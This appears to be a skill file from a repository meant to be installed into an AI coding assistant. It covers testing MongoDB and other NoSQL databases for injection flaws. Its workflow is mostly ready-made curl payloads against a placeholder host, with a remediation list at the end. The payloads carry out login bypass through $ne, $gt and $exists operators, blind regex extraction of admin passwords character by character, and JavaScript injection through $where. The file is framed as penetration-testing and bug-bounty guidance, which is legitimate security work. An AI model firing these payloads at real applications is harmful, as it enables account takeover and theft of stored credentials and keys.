Anthropic-Cybersecurity-Skills exploiting-nosql-injection-vulnerabilities
Detect and exploit NoSQL injection vulnerabilities in MongoDB, CouchDB, and other NoSQL databases to demonstrate
install
source · Clone the upstream repo
git clone https://github.com/mukul975/Anthropic-Cybersecurity-Skills
Claude Code · Install into ~/.claude/skills/
T=$(mktemp -d) && git clone --depth=1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills "$T" && mkdir -p ~/.claude/skills && cp -r "$T/skills/exploiting-nosql-injection-vulnerabilities" ~/.claude/skills/mukul975-anthropic-cybersecurity-skills-exploiting-nosql-injection-vulnerabiliti && rm -rf "$T"
manifest:
skills/exploiting-nosql-injection-vulnerabilities/SKILL.mdsource content
Exploiting NoSQL Injection Vulnerabilities
When to Use
- During web application penetration testing of applications using NoSQL databases
- When testing authentication mechanisms backed by MongoDB or similar databases
- When assessing APIs that accept JSON input for database queries
- During bug bounty hunting on applications with NoSQL backends
- When performing security code review of database query construction
Prerequisites
- Burp Suite Professional or Community Edition with JSON support
- NoSQLMap tool installed (
or from GitHub)pip install nosqlmap - Understanding of MongoDB query operators ($ne, $gt, $regex, $where, $exists)
- Target application using a NoSQL database (MongoDB, CouchDB, Cassandra)
- Proxy configured for HTTP traffic interception
- Python 3.x for custom payload scripting
Workflow
Step 1 — Identify NoSQL Injection Points
# Look for JSON-based login forms or API endpoints # Common indicators: application accepts JSON POST bodies, uses MongoDB # Test with basic syntax-breaking characters curl -X POST http://target.com/api/login \ -H "Content-Type: application/json" \ -d '{"username": "admin\"", "password": "test"}' # Test for operator injection in query parameters curl "http://target.com/api/users?username[$ne]=invalid" # Check for error-based detection curl -X POST http://target.com/api/search \ -H "Content-Type: application/json" \ -d '{"query": {"$gt": ""}}'
Step 2 — Perform Authentication Bypass
# Basic authentication bypass with $ne operator curl -X POST http://target.com/api/login \ -H "Content-Type: application/json" \ -d '{"username": {"$ne": "invalid"}, "password": {"$ne": "invalid"}}' # Bypass with $gt operator curl -X POST http://target.com/api/login \ -H "Content-Type: application/json" \ -d '{"username": {"$gt": ""}, "password": {"$gt": ""}}' # Target specific user with regex curl -X POST http://target.com/api/login \ -H "Content-Type: application/json" \ -d '{"username": "admin", "password": {"$regex": ".*"}}' # Bypass using $exists operator curl -X POST http://target.com/api/login \ -H "Content-Type: application/json" \ -d '{"username": {"$exists": true}, "password": {"$exists": true}}'
Step 3 — Extract Data Using Boolean-Based Blind Injection
# Extract username character by character using $regex # Test if first character of admin password is 'a' curl -X POST http://target.com/api/login \ -H "Content-Type: application/json" \ -d '{"username": "admin", "password": {"$regex": "^a"}}' # Test if first two characters are 'ab' curl -X POST http://target.com/api/login \ -H "Content-Type: application/json" \ -d '{"username": "admin", "password": {"$regex": "^ab"}}' # Enumerate usernames with regex curl -X POST http://target.com/api/login \ -H "Content-Type: application/json" \ -d '{"username": {"$regex": "^adm"}, "password": {"$ne": "invalid"}}'
Step 4 — Exploit JavaScript Injection via $where
# JavaScript injection through $where operator curl -X POST http://target.com/api/search \ -H "Content-Type: application/json" \ -d '{"$where": "this.username == \"admin\""}' # Time-based detection with sleep curl -X POST http://target.com/api/search \ -H "Content-Type: application/json" \ -d '{"$where": "sleep(5000) || this.username == \"admin\""}' # Data exfiltration via $where with string comparison curl -X POST http://target.com/api/search \ -H "Content-Type: application/json" \ -d '{"$where": "this.password.match(/^a/) != null"}'
Step 5 — Use NoSQLMap for Automated Testing
# Clone and setup NoSQLMap git clone https://github.com/codingo/NoSQLMap.git cd NoSQLMap python setup.py install # Run NoSQLMap against target python nosqlmap.py -u http://target.com/api/login \ --method POST \ --data '{"username":"test","password":"test"}' # Alternative: use nosqli scanner pip install nosqli nosqli scan -t http://target.com/api/login -d '{"username":"*","password":"*"}'
Step 6 — Test URL Parameter Injection
# Parameter-based injection (GET requests) curl "http://target.com/api/users?username[$ne]=&password[$ne]=" curl "http://target.com/api/users?username[$regex]=admin&password[$gt]=" curl "http://target.com/api/users?username[$exists]=true" # Array injection via URL parameters curl "http://target.com/api/users?username[$in][]=admin&username[$in][]=root" # Inject via HTTP headers if processed by backend curl http://target.com/api/profile \ -H "X-User-Id: {'\$ne': null}"
Key Concepts
| Concept | Description |
|---|---|
| Operator Injection | Injecting MongoDB operators ($ne, $gt, $regex) into query parameters |
| Authentication Bypass | Using operators to match any document and bypass login checks |
| Blind Extraction | Character-by-character data extraction using $regex boolean responses |
| $where Injection | Executing arbitrary JavaScript on the MongoDB server via $where operator |
| Type Juggling | Exploiting how NoSQL databases handle different input types (string vs object) |
| BSON Injection | Manipulating Binary JSON serialization in MongoDB wire protocol |
| Server-Side JS | JavaScript execution context available in MongoDB for query evaluation |
Tools & Systems
| Tool | Purpose |
|---|---|
| NoSQLMap | Automated NoSQL injection detection and exploitation framework |
| Burp Suite | HTTP proxy for intercepting and modifying JSON requests |
| MongoDB Shell | Direct database interaction for testing query behavior |
| nosqli | Dedicated NoSQL injection scanner and exploitation tool |
| PayloadsAllTheThings | Curated NoSQL injection payload repository |
| Nuclei | Template-based scanner with NoSQL injection detection templates |
| Postman | API testing platform for crafting NoSQL injection requests |
Common Scenarios
- Login Bypass — Bypass MongoDB-backed authentication using
operator injection in username and password fields{"$ne": ""} - Data Enumeration — Extract database contents character by character using
blind injection when no direct output is visible$regex - Privilege Escalation — Modify user role fields through NoSQL injection in profile update endpoints
- API Key Extraction — Extract API keys or tokens stored in MongoDB collections through boolean-based blind techniques
- Account Takeover — Enumerate valid usernames via regex injection then brute-force passwords through operator-based authentication bypass
Output Format
## NoSQL Injection Assessment Report - **Target**: http://target.com/api/login - **Database**: MongoDB 6.0 - **Vulnerability Type**: Operator Injection (Authentication Bypass) - **Severity**: Critical (CVSS 9.8) ### Vulnerable Parameters | Endpoint | Parameter | Injection Type | Impact | |----------|-----------|---------------|--------| | POST /api/login | username | Operator ($ne) | Auth Bypass | | POST /api/login | password | Regex ($regex) | Data Extraction | | GET /api/users | id | $where JS Injection | RCE Potential | ### Proof of Concept - Authentication bypass achieved with: {"username":{"$ne":""},"password":{"$ne":""}} - Extracted 3 admin passwords via blind regex injection - JavaScript execution confirmed via $where operator ### Remediation - Use parameterized queries with MongoDB driver sanitization - Implement input type validation (reject objects where strings expected) - Disable server-side JavaScript execution ($where) in MongoDB config - Apply least-privilege database access controls